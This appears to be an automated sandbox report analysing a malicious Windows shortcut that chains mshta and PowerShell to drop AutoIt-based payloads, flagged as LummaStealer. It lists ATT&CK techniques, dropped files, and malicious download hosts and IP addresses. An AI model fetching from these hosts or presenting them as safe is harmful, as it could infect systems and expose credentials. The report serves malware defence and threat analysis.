Source: PefjSkkhb.exe, 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pifBinary or memory string: WIN_7
Source: SwiftWrite.pifBinary or memory string: WIN_8
Source: SwiftWrite.pif, 00000018.00000000.2421968201.0000000000346000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,11_2_00007FF7C0EE3940
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00007FF7C0EE4074
Source: C:\Users\Public\Guard.exeCode function: 20_2_0072696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,20_2_0072696E
Source: C:\Users\Public\Guard.exeCode function: 20_2_00726E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,20_2_00726E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_0030696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,24_2_0030696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00306E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,24_2_00306E32
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
2
Valid Accounts
2
Native API
1
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
12
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol1
Email Collection
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin Shares21
Input Capture
2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
DLL Side-Loading
NTDS37
System Information Discovery
Distributed Component Object Model3
Clipboard Data
23
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
231
Masquerading
LSA Secrets151
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder
2
Valid Accounts
Cached Domain Credentials31
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
Virtualization/Sandbox Evasion
DCSync13
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation
Proc Filesystem11
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection
/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577196 Sample: duyba.lnk.download.lnk Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 87 tiffany-careers.com 2->87 89 x1.i.lencr.org 2->89 91 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs 2->91 97 Malicious sample detected (through community Yara rule) 2->97 99 Windows shortcut file (LNK) starts blacklisted processes 2->99 101 Multi AV Scanner detection for dropped file 2->101 103 14 other signatures 2->103 14 forfiles.exe 1 2->14         started        17 wscript.exe 2->17         started        19 svchost.exe 1 1 2->19         started        signatures3 process4 dnsIp5 125 Windows shortcut file (LNK) starts blacklisted processes 14->125 22 powershell.exe 7 14->22         started        25 conhost.exe 1 14->25         started        127 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->127 27 SwiftWrite.pif 17->27         started        93 127.0.0.1 unknown unknown 19->93 signatures6 process7 signatures8 107 Windows shortcut file (LNK) starts blacklisted processes 22->107 109 Drops PE files to the user root directory 22->109 111 Powershell drops PE file 22->111 29 mshta.exe 17 22->29         started        process9 dnsIp10 95 tiffany-careers.com 147.45.49.155, 443, 49704, 49707 FREE-NET-ASFREEnetEU Russian Federation 29->95 79 C:\Users\user\AppData\Local\...\ghep2[1], PE32 29->79 dropped 129 Windows shortcut file (LNK) starts blacklisted processes 29->129 131 Suspicious powershell command line found 29->131 34 powershell.exe 17 18 29->34         started        file11 signatures12 process13 file14 71 C:\Users\user\AppData\Roaming\PefjSkkhb.exe, PE32+ 34->71 dropped 105 Binary is likely a compiled AutoIt script file 34->105 38 PefjSkkhb.exe 34->38         started        42 Acrobat.exe 66 34->42         started        44 conhost.exe 34->44         started        signatures15 process16 file17 73 C:\Users\Public\PublicProfile.ps1, ASCII 38->73 dropped 113 Windows shortcut file (LNK) starts blacklisted processes 38->113 115 Multi AV Scanner detection for dropped file 38->115 117 Suspicious powershell command line found 38->117 119 2 other signatures 38->119 46 powershell.exe 38->46         started        49 powershell.exe 38->49         started        52 AcroCEF.exe 107 42->52         started        signatures18 process19 dnsIp20 81 C:\Users\Public\Secure.au3, Unicode 46->81 dropped 54 Guard.exe 46->54         started        58 conhost.exe 46->58         started        85 139.99.188.124, 49716, 49729, 80 OVHFR Canada 49->85 83 C:\Users\Publicbehaviorgraphuard.exe, PE32 49->83 dropped 60 conhost.exe 49->60         started        62 AcroCEF.exe 4 52->62         started        file21 process22 file23 75 C:\Users\user\AppData\...\SwiftWrite.pif, PE32 54->75 dropped 77 C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII 54->77 dropped 121 Windows shortcut file (LNK) starts blacklisted processes 54->121 123 Drops PE files with a suspicious file extension 54->123 64 cmd.exe 54->64         started        signatures24 process25 file26 69 C:\Users\user\AppData\...\SwiftWrite.url, MS 64->69 dropped 67 conhost.exe 64->67         started        process27

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
duyba.lnk.download.lnk20%VirustotalBrowse
duyba.lnk.download.lnk16%ReversingLabsShortcut.Trojan.ForExec
SourceDetectionScannerLabelLink
C:\Users\Public\Guard.exe8%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ghep2[1]55%ReversingLabsWin32.Trojan.LummaStealer
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif8%ReversingLabs
C:\Users\user\AppData\Roaming\PefjSkkhb.exe32%ReversingLabsWin64.Adware.RedCap
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://tiffany-careers.com/ghep2t0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2s.LMEMHX0%Avira URL Cloudsafe
http://tiffany-careers.com/Marketing.pdf0%Avira URL Cloudsafe
http://tiffany-careers.com/Marketing.pdf00%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2o0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2l0%Avira URL Cloudsafe
http://tiffany-careers.com/PefjSkkhb.exep0%Avira URL Cloudsafe
https://tiffany-careers.com/0%Avira URL Cloudsafe
http://crl.microsoft70%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2...0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2%0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep20%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2https://tiffany-careers.com/ghep20%Avira URL Cloudsafe
http://139.99.188.124/kiiMf0%Avira URL Cloudsafe
http://139.99.188.1240%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2Q0%Avira URL Cloudsafe
http://139.99.188.124/QWCheljD.txt0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2d80%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2C:0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2$global:?0%Avira URL Cloudsafe
http://139.99.H0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2~0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2H0%Avira URL Cloudsafe
http://tiffany-careers.com0%Avira URL Cloudsafe
https://tiffany-careers.com/ghep2omQvj0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
tiffany-careers.com
147.45.49.155
truetrue
    unknown
    x1.i.lencr.org
    unknown
    unknownfalse
      high
      nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
      unknown
      unknownfalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://tiffany-careers.com/Marketing.pdffalse
        • Avira URL Cloud: safe
        unknown
        http://139.99.188.124/kiiMftrue
        • Avira URL Cloud: safe
        unknown
        https://tiffany-careers.com/ghep2true
        • Avira URL Cloud: safe
        unknown
        http://139.99.188.124/QWCheljD.txttrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://tiffany-careers.com/ghep2s.LMEMHXmshta.exe, 00000004.00000002.2280670724.000001D8EE70D000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.autoitscript.com/autoit3/JGuard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp, SwiftWrite.pif, 00000018.00000000.2426079955.0000000000359000.00000002.00000001.01000000.00000010.sdmpfalse
          high
          http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.2202478685.0000027015FB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E2C37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2394092266.00000130F13A6000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://tiffany-careers.com/ghep2tmshta.exe, 00000004.00000002.2279706602.000001D0EC538000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.2304075109.00000130E2BAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.2304075109.00000130E2BAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://tiffany-careers.com/ghep2omshta.exe, 00000004.00000002.2280000669.000001D0EC556000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277367980.000001D0EC556000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://tiffany-careers.com/Marketing.pdf0powershell.exe, 00000006.00000002.2166249488.000002700616A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://go.micropowershell.exe, 00000012.00000002.2304075109.00000130E24AC000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://tiffany-careers.com/ghep2...mshta.exe, 00000004.00000003.2272974753.000001D8EE7AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269552395.000001D8EE7AB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2273229589.000001D8EE7AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2281088808.000001D8EE7AF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://tiffany-careers.com/PefjSkkhb.exeppowershell.exe, 00000006.00000002.2166249488.00000270063DD000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    https://contoso.com/Licensepowershell.exe, 00000012.00000002.2394092266.00000130F13A6000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://tiffany-careers.com/ghep2lmshta.exe, 00000004.00000002.2279706602.000001D0EC538000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://contoso.com/Iconpowershell.exe, 00000012.00000002.2394092266.00000130F13A6000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://tiffany-careers.com/mshta.exe, 00000004.00000002.2280205979.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2276856139.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269204608.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2273283593.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.ver)svchost.exe, 00000005.00000002.3293299612.000001CFDD600000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000005.00000003.2082990781.000001CFDD410000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drfalse
                            high
                            http://crl.microsoft7powershell.exe, 00000012.00000002.2302335696.00000130DF934000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://tiffany-careers.com/ghep2%mshta.exe, 00000004.00000002.2280075784.000001D0EC573000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277213025.000001D0EC570000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.autoitscript.com/autoit3/Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.2304075109.00000130E2BAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://g.live.com/odclientsettings/Prod/C:edb.log.5.drfalse
                                  high
                                  https://tiffany-careers.com/ghep2https://tiffany-careers.com/ghep2mshta.exe, 00000004.00000003.2274189869.000001D8F2935000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://139.99.188.124powershell.exe, 00000012.00000002.2304075109.00000130E1558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E24AC000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://tiffany-careers.com/ghep2Qmshta.exe, 00000004.00000002.2280000669.000001D0EC556000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277367980.000001D0EC556000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://contoso.com/powershell.exe, 00000012.00000002.2394092266.00000130F13A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.2202478685.0000027015FB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E2C37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2394092266.00000130F13A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://oneget.orgXpowershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://tiffany-careers.com/ghep2d8mshta.exe, 00000004.00000003.2270292666.000001D8F2785000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269906987.000001D8F2785000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://tiffany-careers.com/ghep2C:forfiles.exe, 00000000.00000002.2049373136.0000019BECEE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280293129.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2279706602.000001D0EC530000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2273283593.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2276856139.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269204608.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://tiffany-careers.com/ghep2Hmshta.exe, 00000004.00000002.2279297600.000001D0EC4C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://aka.ms/pscore68powershell.exe, 00000006.00000002.2166249488.0000027005F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E1331000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://139.99.Hpowershell.exe, 00000012.00000002.2304075109.00000130E2959000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://tiffany-careers.com/ghep2$global:?powershell.exefalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://tiffany-careers.com/ghep2~mshta.exe, 00000004.00000002.2279706602.000001D0EC538000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280000669.000001D0EC556000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277367980.000001D0EC556000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.2166249488.0000027005F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E1331000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://tiffany-careers.compowershell.exe, 00000006.00000002.2166249488.000002700616A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://crl.vmshta.exe, 00000004.00000002.2280512235.000001D0EC614000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2270176062.000001D0EC613000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269204608.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://tiffany-careers.com/ghep2omQvjmshta.exe, 00000004.00000003.2269204608.000001D0EC5C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280174249.000001D0EC5C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://oneget.orgpowershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                139.99.188.124
                                                unknownCanada
                                                16276OVHFRtrue
                                                147.45.49.155
                                                tiffany-careers.comRussian Federation
                                                2895FREE-NET-ASFREEnetEUtrue
                                                IP
                                                127.0.0.1
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1577196
                                                Start date and time:2024-12-18 09:12:06 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 30s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:26
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:duyba.lnk.download.lnk
                                                Detection:MAL
                                                Classification:mal100.expl.evad.winLNK@41/73@4/3
                                                EGA Information:
                                                • Successful, ratio: 50%
                                                HCA Information:
                                                • Successful, ratio: 99%
                                                • Number of executed functions: 92
                                                • Number of non-executed functions: 275
                                                Cookbook Comments:
                                                • Found application associated with file extension: .lnk
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                • Excluded IPs from analysis (whitelisted): 92.122.16.236, 23.218.208.109, 92.122.16.141, 172.64.41.3, 162.159.61.3, 50.16.47.176, 54.224.241.105, 34.237.241.83, 18.213.11.84, 23.32.238.18, 23.32.238.74, 23.195.39.65, 104.122.212.204, 23.32.239.56, 2.19.198.27, 52.6.155.20, 20.109.210.53, 13.107.246.63
                                                • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                                • Execution Graph export aborted for target mshta.exe, PID 5060 because there are no executed function
                                                • Execution Graph export aborted for target powershell.exe, PID 4308 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 7480 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                TimeTypeDescription
                                                03:13:00API Interceptor2x Sleep call for process: svchost.exe modified
                                                03:13:00API Interceptor1x Sleep call for process: mshta.exe modified
                                                03:13:01API Interceptor115x Sleep call for process: powershell.exe modified
                                                03:13:15API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                03:14:00API Interceptor1988x Sleep call for process: Guard.exe modified
                                                03:14:16API Interceptor983x Sleep call for process: SwiftWrite.pif modified
                                                09:13:24AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                139.99.188.124FwR7as4xUq.exeGet hashmaliciousUnknownBrowse
                                                • 139.99.188.124/EPDjSfs.txt
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                FREE-NET-ASFREEnetEUhttps://147.45.47.98/error.jsGet hashmaliciousUnknownBrowse
                                                • 147.45.47.98
                                                AbC0LBkVhr.exeGet hashmaliciousSocks5SystemzBrowse
                                                • 147.45.126.31
                                                amd64.elfGet hashmaliciousUnknownBrowse
                                                • 193.233.202.23
                                                TRC.arm.elfGet hashmaliciousMiraiBrowse
                                                • 147.45.45.242
                                                htZgRRla8S.exeGet hashmaliciousLummaC StealerBrowse
                                                • 147.45.44.131
                                                Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                • 147.45.44.131
                                                Captcha.htaGet hashmaliciousHTMLPhisherBrowse
                                                • 147.45.44.131
                                                Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                • 147.45.44.131
                                                EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                                                • 147.45.44.131
                                                arm5.elfGet hashmaliciousUnknownBrowse
                                                • 193.233.202.23
                                                OVHFRx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 54.36.60.244
                                                jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                • 51.75.58.223
                                                https://cc.naver.com/cc?a=pst.link&m=1&nsc=Mblog.post&u=https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPyGet hashmaliciousHTMLPhisherBrowse
                                                • 167.114.27.228
                                                c2.exeGet hashmaliciousXmrigBrowse
                                                • 51.79.145.144
                                                Clienter.dll.dllGet hashmaliciousUnknownBrowse
                                                • 51.77.90.246
                                                uEhN67huiV.dllGet hashmaliciousUnknownBrowse
                                                • 54.36.205.38
                                                https://alluc.co/watch-movies/passengers.htmlGet hashmaliciousUnknownBrowse
                                                • 54.38.113.6
                                                Clienter.dll.dllGet hashmaliciousUnknownBrowse
                                                • 94.23.76.52
                                                https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                • 46.105.222.162
                                                1.elfGet hashmaliciousUnknownBrowse
                                                • 51.77.132.207
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                37f463bf4616ecd445d4a1937da06e195j0fix05fy.jsGet hashmaliciousNetSupport RATBrowse
                                                • 147.45.49.155
                                                Setup.msiGet hashmaliciousVidarBrowse
                                                • 147.45.49.155
                                                htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                • 147.45.49.155
                                                67618a47ee8c5.vbsGet hashmaliciousMint StealerBrowse
                                                • 147.45.49.155
                                                PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                                • 147.45.49.155
                                                BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                • 147.45.49.155
                                                ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                • 147.45.49.155
                                                87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 147.45.49.155
                                                dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                • 147.45.49.155
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\Public\Guard.exec2.htaGet hashmaliciousXWormBrowse
                                                  c2.htaGet hashmaliciousXWormBrowse
                                                    c2.htaGet hashmaliciousXWormBrowse
                                                      c2.htaGet hashmaliciousXWormBrowse
                                                        FwR7as4xUq.exeGet hashmaliciousUnknownBrowse
                                                          InsertSr.exeGet hashmaliciousGO BackdoorBrowse
                                                            vqMMwqCFZQ.exeGet hashmaliciousUnknownBrowse
                                                              fT0L8msd6q.exeGet hashmaliciousUnknownBrowse
